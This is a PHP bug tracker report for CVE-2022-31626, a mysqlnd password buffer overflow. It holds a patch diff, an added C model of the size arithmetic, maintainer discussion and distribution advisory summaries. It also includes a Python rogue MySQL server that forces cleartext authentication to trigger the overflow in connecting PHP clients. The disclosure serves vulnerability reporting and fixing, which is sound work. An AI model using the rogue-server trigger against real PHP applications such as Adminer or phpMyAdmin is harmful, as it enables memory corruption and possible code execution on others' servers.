CVE-2022-31626: mysqlnd/pdo password buffer overflow leading to RCE
In PHP versions 7.4.x below 7.4.30, 8.0.x below 8.0.20, and 8.1.x below 8.1.7, when the pdo_mysql extension is used with the mysqlnd driver, if a third party is allowed to supply both the host to connect to and the password for the connection, a password of excessive length can trigger a buffer overflow in PHP, which can lead to a remote code execution vulnerability.
Sec Bug #81719: mysqlnd/pdo password buffer overflow leading to RCE
Submitted: 2022-05-16 14:33 UTC
Modified: 2022-06-15 07:24 UTC
Votes: 11
Avg. Score: 3.0 ± 1.0
Reproduced: 2 of 2 (100.0%)
Same Version: 2 (100.0%)
Same OS: 2 (100.0%)
From: c dot fol at ambionics dot io
Assigned: cmb
Status: Closed
Package: PDO MySQL
PHP Version: 8.1.6
OS:
Private report: No
CVE-ID: 2022-31626
[2022-05-16 14:33 UTC] c dot fol at ambionics dot io
Description:
Hello PHP team!
INFOS
There’s a buffer overflow here: https://github.com/php/php-src/blob/master/ext/mysqlnd/mysqlnd_wireprotocol.c#L785
It copies `auth_data_len` bytes from `buffer + MYSQLND_HEADER_SIZE`, but only allocates `auth_data_len` bytes.
This bug affects mysqlnd and therefore PDO.
For context, this function copies the user submitted password (`packet->auth_data`) to a buffer in order to send it to a MySQL server. This happens with the legacy auth method that requires you to send a password as raw instead of having some kind of challenge/response logic.
This is exploitable remotely by making PHP connect to a rogue MySQL server. Tools such as Adminer and phpMyAdmin are affected. Impact is remote code execution.
TEST SCRIPT
I’ve added a fake MySQL Server coded in python to demonstrate the bug at the bottom of this bug report. This should probably be removed before the bug goes public.
Install pwntools (https://github.com/Gallopsled/pwntools#readme), and start it. It’ll wait for connections. Then, you can start PHP in debug mode, with GDB and break on the indicated line:
```
$ gdb --args ./sapi/cli/php -r "new PDO('mysql:host=here.localhost', 'b', str_repeat('a',5000));"
(gdb) b mysqlnd_wireprotocol.c:785
(gdb) r
```
As it breaks, you’ll see that the copy happens OOB.
PATCH
Just add the size of the header in the computation.
```
- zend_uchar * const buffer = pfc->cmd_buffer.length >= packet->auth_data_len? pfc->cmd_buffer.buffer : mnd_emalloc(packet->auth_data_len);
- size_t total_packet_size = packet->auth_data_len + MYSQLND_HEADER_SIZE;
- zend_uchar * const buffer = pfc->cmd_buffer.length >= total_packet_size? pfc->cmd_buffer.buffer : mnd_emalloc(total_packet_size);
```
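Review bot: the two replacement lines carry the same `-` prefix as the removed line, so as posted the hunk reads as three deletions and no additions; the `size_t total_packet_size = ...` line and the new `buffer` line should be marked `+`. On substance, using `total_packet_size` for both the `cmd_buffer.length` comparison and `mnd_emalloc` is the right shape, because the copy lands at `buffer + MYSQLND_HEADER_SIZE` and the old reuse check also let a password within `MYSQLND_HEADER_SIZE` bytes of `cmd_buffer.length` spill out of the preallocated buffer; a one-line comment stating that the header is included in the size would help the next reader.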
Best regards,
Charles Fol
ambionics.io
```
#!/usr/bin/env python3
from pwn import *


class ProtoError(Exception):
    def __init__(self):
        super().__init__('Unknown SQL command')


class Output:
    def clear(self):
        print('\r\x1b[K', end='')
        return self

    def __getattr__(self, x):
        # out.info(...), out.error(...) etc. all become a formatted print
        def wrapper(msg='', *args, **kwargs):
            return print(msg.format(*args), **kwargs)
        return wrapper


out = Output()


def failure(message):
    out.error(message)
    exit()


def zend_string_size(s):
    """When you create a PHP string of N bytes, it will allocate N+25 bytes."""
    return s - 24 - 1


class Handler:
    """Handles a connection to the fake MySQL server.

    When the client auths, we change the authentication method to cleartext
    to trigger the overflow. Otherwise, once we receive a packet, we send
    back what the client wants to hear.
    """

    def __init__(self, socket):
        self.socket = socket
        self.handle()

    def die(self):
        self.socket.close()

    def handle(self):
        try:
            self.handle_handshake()
            while self.handle_command() != 'quit':
                pass
        except ProtoError:
            raise
        except EOFError:
            #out.failure('EOF')
            pass
        except Exception as e:
            #out.failure('{}: {:}', type(e).__name__, str(e))
            raise
        finally:
            self.socket.close()

    def handle_command(self):
        packet = self.read_packet()
        command = packet[0]
        # Send query
        if command == 0x03:
            self.handle_query(packet[1:])
            return
        # Change DB
        if command == 0x02:
            #out.info('Change DB: {}', packet[1:].decode())
            self.send('07 00 00 01 00 00 00 02 00 00 00')
            return
        # COM_SET_OPTION
        if command == 0x1b:
            #out.info('Unknown packet')
            self.send('05 00 00 01 fe 00 00 02 00')
            return
        # Quit
        if command == 0x01:
            #out.info('Closing connection')
            return 'quit'

    def send(self, data):
        self.socket.send(bytes.fromhex(data.replace(' ', '')))

    def read_packet(self):
        # MySQL packet header: 3-byte little-endian length, then 1-byte sequence id
        packet_header = self.socket.recv(4)
        if len(packet_header) != 4:
            raise ProtoError()
        size = u32(packet_header) & 0xffffff
        contents = self.socket.recv(size)
        return contents

    def handle_handshake(self):
        #out.success('Got connection, authenticating...')
        self.send('4a0000000a382e302e3233009a0e000011686652356c700800ffffff0200ffcf150000000000000000000077315b77715b5315523a274e0063616368696e675f736861325f70617373776f726400')
        self.read_packet()
        self.send('020000020103')
        # switch auth to cleartext password (pam)
        self.send('16000003FE6d7973716c5f636c6561725f70617373776f726400')
        self.read_packet()
        self.read_packet()
        # The overflow :)
        self.socket.recv(4)
        self.send('0700000500000002000000')

    def handle_query(self, query):
        #out.info('Query: {}', query.decode())
        if query.startswith(b'SET '):
            self.send('07 00 00 01 00 00 00 02 00 00 00')
        elif query.startswith(b'SELECT TABLE_NAME, TABLE_TYPE'):
            self.send('0100000102480000020364656612696e666f726d6174696f6e5f736368656d61065441424c4553067461626c65730a5441424c455f4e414d450a5441424c455f4e414d450cff0000010000fd8110000000480000030364656612696e666f726d6174696f6e5f736368656d61065441424c4553067461626c65730a5441424c455f545950450a5441424c455f545950450cff002c000000fe811100000005000004fe000002000d00000501610a42415345205441424c451000000604746573740a42415345205441424c4505000007fe00000200')
        elif query.startswith(b'SELECT @@default_storage_engine'):
            self.send('01000001012e0000020364656600000018404064656661756c745f73746f726167655f656e67696e65000cff0054550100fd00001f000005000003fe000002000700000406496e6e6f444205000005fe00000200')
        elif query.startswith(b'SHOW COLLATION'):
            # the two response blobs were not preserved on this page
            self.send('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')
            self.send('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')
        elif query.startswith(b'SHOW CREATE DATABASE'):
            self.send('01000001021e00000203646566000000084461746162617365000cff0000010000fd01001f000025000003036465660000000f437265617465204461746162617365000cff0000100000fd01001f000005000004fe000002008400000504746573747e43524541544520444154414241534520607465737460202f2a2134303130302044454641554c54204348415241435445522053455420757466386d623420434f4c4c41544520757466386d62345f303930305f61695f6369202a2f202f2a2138303031362044454641554c5420454e4352595054494f4e3d274e27202a2f05000006fe00000200')
        elif query.startswith(b'SELECT ROUTINE_NAME AS'):
            self.send('0100000104510000020364656612696e666f726d6174696f6e5f736368656d6108524f5554494e455308524f5554494e45530d53504543494649435f4e414d450c524f5554494e455f4e414d450cff0000010000fd0150000000500000030364656612696e666f726d6174696f6e5f736368656d6108524f5554494e455308524f5554494e45530c524f5554494e455f4e414d450c524f5554494e455f4e414d450cff0000010000fd0150000000500000040364656612696e666f726d6174696f6e5f736368656d6108524f5554494e455308524f5554494e45530c524f5554494e455f545950450c524f5554494e455f545950450cff0024000000fe815100000042000005036465660008524f5554494e455308524f5554494e45530e4454445f4944454e5449464945520e4454445f4944454e5449464945520cff00f4ffff0bfc80001f000005000006fe0000020005000007fe00000200')
        elif query.startswith(b'SHOW EVENTS'):
            # response blob not preserved on this page
            self.send('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')
        elif query.startswith(b'SELECT TABLE_NAME AS Name'):
            self.send('01000001033c0000020364656612696e666f726d6174696f6e5f736368656d61065441424c4553067461626c6573044e616d65044e616d650cff0000010000fd81100000003a0000030364656612696e666f726d6174696f6e5f736368656d61065441424c45530006456e67696e6506456e67696e650cff0000010000fd00000000003c0000040364656612696e666f726d6174696f6e5f736368656d61065441424c45530007436f6d6d656e7407436f6d6d656e740cff0000600000fc100000000005000005fe000002000a000006016106496e6e6f4442000d000007047465737406496e6e6f44420005000008fe00000200')
        elif query.startswith(b'SELECT /*+ MAX_'):
            self.send('01000001014e0000020364656612696e666f726d6174696f6e5f736368656d6108534348454d41544108736368656d6174610b534348454d415f4e414d450b534348454d415f4e414d450cff0000010000fd811000000005000003fe000022001300000412696e666f726d6174696f6e5f736368656d6106000005056d7973716c1300000612706572666f726d616e63655f736368656d61040000070373797305000008047465737405000009fe00002200')
        elif query.startswith(b'SHOW INDEX FROM `test`'):
            # response blob not preserved on this page
            self.send('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')
        elif query.startswith(b'EXPLAIN PARTITIONS SELECT * FROM '):
            self.send('b2000001ff2804233432303030596f75206861766520616e206572726f7220696e20796f75722053514c2073796e7461783b20636865636b20746865206d616e75616c207468617420636f72726573706f6e647320746f20796f7572204d7953514c207365727665722076657273696f6e20666f72207468652072696768742073796e74617820746f20757365206e656172202753454c454354202a2046524f4d20746573742e7465737427206174206c696e652031')
        elif query.startswith(b'SELECT * FROM test.test'):
            # handle_select_test() is not defined in the posted script
            self.handle_select_test()
        elif query.startswith(b'SHOW WARNINGS'):
            self.send('01000001031b00000203646566000000054c6576656c000cff001c000000fd01001f00001a0000030364656600000004436f6465000c3f000400000003a1000000001d00000403646566000000074d657373616765000cff0000080000fd01001f000005000005fe0000020005000006fe00000200')
        else:
            print(hexdump(query))
            raise ProtoError()


class SQLServer:
    """Rogue MySQL server."""
    session_class = None

    def __init__(self):
        self.sessions = []
        # pwntools' server() helper accepts connections and calls back per client
        self.socket = server(3306, callback=self.accept)

    def accept(self, client_socket):
        self.sessions.append(
            self.session_class(client_socket)
        )

    def set_session_handler(self, session_class):
        self.session_class = session_class

    def stop(self):
        self.socket.close()
        for session in self.sessions:
            session.die()


# named sql_server so it does not shadow pwntools' server() used above
sql_server = SQLServer()
sql_server.set_session_handler(Handler)
pause()
```
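The size computation from the INFOS section and the patch above, modelled as an added example in C (not php-src code): it reproduces the arithmetic of the vulnerable and patched buffer choice, encodes the 4-byte packet header, and also shows the corner the report does not spell out, where a password within four bytes of the preallocated buffer length overflows on the reuse path too. The 4096-byte preallocated command buffer is an assumption; the report does not state its real size.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define MYSQLND_HEADER_SIZE 4        /* 3-byte payload length + 1-byte sequence id */
#define ASSUMED_CMD_BUFFER_LEN 4096  /* hypothetical size of the preallocated cmd_buffer */

/* Bytes the packet writer touches: the header plus auth_data_len password bytes. */
size_t bytes_written(size_t auth_data_len) {
    return auth_data_len + MYSQLND_HEADER_SIZE;
}

/* Buffer size chosen by the vulnerable code: reuse cmd_buffer when it holds
 * auth_data_len bytes, otherwise allocate exactly auth_data_len. */
size_t vulnerable_buffer_size(size_t cmd_buffer_len, size_t auth_data_len) {
    return cmd_buffer_len >= auth_data_len ? cmd_buffer_len : auth_data_len;
}

/* Buffer size chosen by the patched code: the reuse check and the allocation
 * both use the header-inclusive total. */
size_t fixed_buffer_size(size_t cmd_buffer_len, size_t auth_data_len) {
    size_t total_packet_size = auth_data_len + MYSQLND_HEADER_SIZE;
    return cmd_buffer_len >= total_packet_size ? cmd_buffer_len : total_packet_size;
}

/* Bytes written past the end of a buffer of the given size (0 means in bounds). */
size_t overflow_bytes(size_t buffer_size, size_t auth_data_len) {
    size_t need = bytes_written(auth_data_len);
    return need > buffer_size ? need - buffer_size : 0;
}

/* Encode the packet header as the wire protocol does: 24-bit little-endian
 * payload length, then the sequence id. Returns 0 if the length cannot be
 * represented, which is a bound the writer must enforce as well. */
int write_header(uint8_t hdr[MYSQLND_HEADER_SIZE], size_t payload_len, uint8_t seq) {
    if (payload_len > 0xffffffu) return 0;
    hdr[0] = (uint8_t)(payload_len & 0xff);
    hdr[1] = (uint8_t)((payload_len >> 8) & 0xff);
    hdr[2] = (uint8_t)((payload_len >> 16) & 0xff);
    hdr[3] = seq;
    return 1;
}

int main(void) {
    /* Constructed password lengths: short, just under the buffer, at it, and ~5000 as in the report. */
    size_t lens[] = {8, 4093, 4096, 5000};
    for (size_t i = 0; i < sizeof lens / sizeof lens[0]; i++) {
        size_t v = vulnerable_buffer_size(ASSUMED_CMD_BUFFER_LEN, lens[i]);
        size_t f = fixed_buffer_size(ASSUMED_CMD_BUFFER_LEN, lens[i]);
        printf("password %4zu bytes: vulnerable writes %zu past the buffer, patched %zu\n",
               lens[i], overflow_bytes(v, lens[i]), overflow_bytes(f, lens[i]));
    }
    return 0;
}
```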
History
[2022-05-17 13:59 UTC] [email protected]
-Status: Open
+Status: Verified
-Assigned To:
+Assigned To: cmb
[2022-05-17 13:59 UTC] [email protected]
Thanks for reporting the issue (very thorough report)! I can reproduce the bug, and your patch would obviously solve that.
However, I'm having some issues with the server script, which apparently stalls at the end of the handshake (Handler.handle_handshake). It would be nice to commit that as a regression test, though (and also as the beginning of a more general fake server test suite); maybe you have an idea how to fix that.
Anyway, as I understand it, this issue would only happen for *very* long passwords (~ 5000 bytes or more); that would likely *not* qualify this as security issue. Or are there other more likely cases which may trigger this bug?
[2022-05-25 21:34 UTC] [email protected]
I think since it can be common for a hosted tool to accept a user-supplied password, and as the required length is not ridiculous (5k, not gigabytes), we should treat it as security.
[2022-05-25 21:40 UTC] [email protected]
-CVE-ID: needed
+CVE-ID: 2022-31626
[2022-05-31 13:43 UTC] c dot fol at ambionics dot io
Hello cmb,
Sorry for the delay, it looks like your tracker refuses to send me emails for this bug (although it works fine, usually). Have you made any progress regarding the server? I implemented this server a long time ago, so I don't really remember. I might be able to have a look next week if you're still stuck.
Regards
[2022-06-07 10:27 UTC] [email protected]
> Have you made any progress regarding the server?
No, I didn’t work further on that. I think the problem is that the test would always hang, but it was sufficient to trigger the buffer overflow. Now that the bug is fixed, the test would need to proceed.
[2022-06-15 07:24 UTC] [email protected]
-Status: Verified
+Status: Closed
[2022-06-15 07:24 UTC] [email protected]
The fix for this bug has been committed. If you are still experiencing this bug, try to check out latest source from https://github.com/php/php-src and re-test. Thank you for the report, and for helping us make PHP better.
Related news
Gentoo Linux Security Advisory 202209-20 - Multiple vulnerabilities have been discovered in PHP, the worst of which could result in local root privilege escalation. Versions less than 7.4.30:7.4 are affected.
Red Hat Security Advisory 2022-5904-01 - PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server. Issues addressed include a buffer overflow vulnerability.
An update for php is now available for Red Hat Enterprise Linux 9. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-31626: php: password of excessive length triggers buffer overflow leading to RCE
Ubuntu Security Notice 5479-3 - USN-5479-1 fixed vulnerabilities in PHP. Unfortunately that update for CVE-2022-31625 was incomplete for Ubuntu 18.04 LTS. This update fixes the problem. Charles Fol discovered that PHP incorrectly handled initializing certain arrays when handling the pg_query_params function. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code. Charles Fol discovered that PHP incorrectly handled passwords in mysqlnd. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code.
Ubuntu Security Notice 5479-2 - USN-5479-1 fixed vulnerabilities in PHP. This update provides the corresponding updates for Ubuntu 16.04 ESM. Charles Fol discovered that PHP incorrectly handled initializing certain arrays when handling the pg_query_params function. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code. Charles Fol discovered that PHP incorrectly handled passwords in mysqlnd. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code.
Red Hat Security Advisory 2022-5491-01 - PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server. Issues addressed include buffer overflow and privilege escalation vulnerabilities.
An update for rh-php73-php is now available for Red Hat Software Collections. Red Hat Product Security has rated this update as having a security impact of Important. Related CVEs: * CVE-2021-21703: php: Local privilege escalation via PHP-FPM * CVE-2021-21707: php: special character breaks path in xml parsing * CVE-2022-31625: php: uninitialized array in pg_query_params() leading to RCE * CVE-2022-31626: php: password of excessive length triggers buffer overflow leading to RCE
An update for the php:8.0 module is now available for Red Hat Enterprise Linux 8. Red Hat Product Security has rated this update as having a security impact of Important. Related CVEs: * CVE-2022-31626: php: password of excessive length triggers buffer overflow leading to RCE
An update for the php:7.4 module is now available for Red Hat Enterprise Linux 8. Red Hat Product Security has rated this update as having a security impact of Important. Related CVEs: * CVE-2022-31626: php: password of excessive length triggers buffer overflow leading to RCE
An update for the php:7.4 module is now available for Red Hat Enterprise Linux 8.4 Extended Update Support. Red Hat Product Security has rated this update as having a security impact of Important. Related CVEs: * CVE-2022-31626: php: password of excessive length triggers buffer overflow leading to RCE
Ubuntu Security Notice 5479-1 - Charles Fol discovered that PHP incorrectly handled initializing certain arrays when handling the pg_query_params function. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code. Charles Fol discovered that PHP incorrectly handled passwords in mysqlnd. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code.